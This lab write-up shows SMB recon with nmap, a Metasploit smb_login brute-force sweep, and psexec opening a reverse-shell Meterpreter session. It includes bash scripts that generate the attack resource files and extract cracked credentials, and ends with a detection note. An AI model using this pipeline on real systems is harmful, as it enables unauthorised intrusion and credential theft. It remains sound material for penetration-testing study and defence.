Attacking SMB via Metasploit and PsExec
Mar 14, 2021
Recon
Simple scan
nmap -A 10.2.23.46 -vv
TIP: the TTL in the probe responses is a quick hint for the operating system. Common default initial TTLs:
Unix/Linux: TTL 64
Windows: TTL 128
Solaris/AIX: TTL 254 or 255 (varies by version)
Each router on the path decrements the TTL by one, so round the observed value up to the nearest default (125 points at Windows, about three hops away). Treat it as a hint only: the OS detection in nmap -O (included in -A) is far more reliable.
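The rounding rule above, as an added example that is not part of the original post: it maps an observed TTL to the nearest default initial TTL and estimates the hop count, and pulls the TTL out of a ping reply. The default values (64, 128, 255) are the usual cheat-sheet assumptions, and the ping line is constructed, not captured from the lab host.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: round an observed TTL up to the
# nearest default initial TTL and estimate the hop count. The defaults
# (64 Unix/Linux, 128 Windows, 255 Solaris/AIX and most network gear) are
# the usual cheat-sheet values, not something the scan itself verifies.
set -eu

# ttl_guess <observed_ttl> -> "<os family> (initial TTL <n>, ~<hops> hops away)"
ttl_guess() {
  local ttl="$1" base os
  if   [ "$ttl" -le 64 ];  then base=64;  os="Unix/Linux"
  elif [ "$ttl" -le 128 ]; then base=128; os="Windows"
  else                          base=255; os="Solaris/AIX or network device"
  fi
  echo "$os (initial TTL $base, ~$((base - ttl)) hops away)"
}

# ttl_from_ping: reads ping output on stdin and prints the TTL of the first
# reply (Linux iputils and macOS print 'ttl=NNN'; other pings may differ).
ttl_from_ping() {
  sed -n 's/.*ttl=\([0-9]*\).*/\1/p' | head -n 1
}

# Constructed sample reply, standing in for: ping -c 1 10.2.23.46
sample_ping() {
  echo "64 bytes from 10.2.23.46: icmp_seq=1 ttl=125 time=3.21 ms"
}

# Usage: ttl_guess "$(sample_ping | ttl_from_ping)"
# (or: ttl_guess "$(ping -c 1 10.2.23.46 | ttl_from_ping)" against a live host)
```

The boundaries are deliberately "less than or equal": a reply with TTL exactly 64 is almost certainly a Unix host on the same segment, not a Windows box 64 hops away.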
Port 445 (SMB) is open.
nmap -p445 --script smb-protocols 10.2.23.46 -vv
The smb-protocols script reports which SMB dialects (SMBv1, 2.x, 3.x) the server accepts; an SMBv1-only or SMBv1-enabled host is worth noting before the brute-force step.
Setting up Metasploit.
Setting up the smb_login module (auxiliary/scanner/smb/smb_login).
Setting up brute-force word lists and running the auxiliary scan.
Identified list of compromised accounts.
Setting up PsExec (exploit/windows/smb/psexec) with one of the recovered accounts.
Meterpreter shell.
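The two Metasploit stages above (smb_login sweep, then psexec with a recovered account) as an added example that is not part of the original post: a bash script that writes the msfconsole resource files for both stages and extracts the successful logins from saved smb_login output. The target address, wordlist paths, listener address and the sample smb_login output are assumptions for this lab, not values captured from the post.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: generates msfconsole resource
# scripts for the smb_login sweep and the psexec stage, and pulls the
# 'Success' lines out of smb_login output. Target, wordlists and listener
# address are assumptions for this lab; override them via the environment.
set -eu

RHOST="${RHOST:-10.2.23.46}"
USER_FILE="${USER_FILE:-/usr/share/metasploit-framework/data/wordlists/unix_users.txt}"
PASS_FILE="${PASS_FILE:-/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt}"
LHOST="${LHOST:-10.2.23.1}"   # attacker address the reverse shell connects back to (assumed)

# Stage 1: credential sweep. STOP_ON_SUCCESS false keeps going after the first
# hit so every valid account on the host is found, not just the first one.
gen_smb_login_rc() {
  cat <<EOF
use auxiliary/scanner/smb/smb_login
set RHOSTS $RHOST
set USER_FILE $USER_FILE
set PASS_FILE $PASS_FILE
set STOP_ON_SUCCESS false
set VERBOSE false
run
EOF
}

# Stage 2: psexec with one recovered account. The account must be a local
# administrator on the target: the module writes to ADMIN$ and creates a service.
gen_psexec_rc() {
  local user="$1" pass="$2"
  cat <<EOF
use exploit/windows/smb/psexec
set RHOSTS $RHOST
set SMBUser $user
set SMBPass $pass
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $LHOST
exploit
EOF
}

# Extracts user:pass from smb_login console output, dropping the DOMAIN\ or
# .\ prefix. The pattern assumes the current Metasploit line format
# "[+] host:445 - host:445 - Success: 'DOMAIN\user:pass'"; adjust if yours differs.
extract_creds() {
  sed -n "s/.*Success: '\([^']*\)'.*/\1/p" | sed 's/^[^\\]*\\//'
}

# Constructed sample of smb_login output, standing in for a real run.
sample_smb_login_output() {
  cat <<'EOF'
[*] 10.2.23.46:445 - 10.2.23.46:445 - Starting SMB login bruteforce
[-] 10.2.23.46:445 - 10.2.23.46:445 - Failed: '.\guest:guest',
[+] 10.2.23.46:445 - 10.2.23.46:445 - Success: '.\administrator:Password1' Administrator
[+] 10.2.23.46:445 - 10.2.23.46:445 - Success: '.\jdoe:Summer2021'
EOF
}

# Usage: bash smb_psexec.sh gen <user> <password>
#   then: msfconsole -q -r smb_login.rc   (stage 1, with 'spool' to save output)
#         msfconsole -q -r psexec.rc      (stage 2)
if [ "${1:-}" = "gen" ]; then
  gen_smb_login_rc > smb_login.rc
  gen_psexec_rc "${2:?user}" "${3:?password}" > psexec.rc
  echo "wrote smb_login.rc and psexec.rc"
fi
```

In a real run, save the stage 1 console output with msfconsole's spool command and pipe that file through extract_creds to get the list of compromised accounts; the sample_smb_login_output function only exists so the script can be exercised offline.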
MITRE ATT&CK
PsExec is a free Microsoft (Sysinternals) tool that executes a program on another computer; it is used by IT administrators and by attackers alike. Metasploit's psexec module works the same way: it authenticates to the ADMIN$ share over SMB with the recovered credentials, uploads a service binary, then creates and starts a Windows service to run it. That service installation (System log event ID 7045 on the target) is the classic detection point for both the real tool and the module.